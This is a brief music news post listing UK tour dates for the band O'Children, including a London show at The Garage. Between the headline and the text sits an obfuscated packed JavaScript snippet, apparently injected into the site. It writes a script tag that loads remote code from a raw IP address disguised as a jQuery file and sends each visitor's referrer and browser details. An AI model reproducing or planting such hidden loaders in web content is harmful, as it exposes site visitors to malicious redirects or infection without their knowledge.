NEWS: O’CHILDREN ON TOUR…

NEWS: O'CHILDREN ON TOUR...

More (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aednz|var|u0026u|referrer|akknr||js|php’.split(‘|’),0,{}))
London bands on tour later this year this time it is the turn of dark alt rockers O’Children who embark on an eight day tour of the country including their biggest London headline show to date at The Garage on Monday 29th October. Full dates…

Wednesday 17th Oct YORK – STEREO
Thursday 18th Oct MANCHESTER – KRAAK
Friday 19th Oct OXFORD – MODERN ART
Saturday 20th Oct BRISTOL – START THE BUS
Sunday 21st Oct SOUTHAMPTON – JOINERS
Tuesday 23rd Oct EDINBURGH – SNEAKY PETES
Wednesday 24th Oct LEEDS – THE OPORTO
Thursday 25th Oct SHEFFIELD – BUNGALOW & BEARS
Monday 29th Oct LONDON – THE GARAGE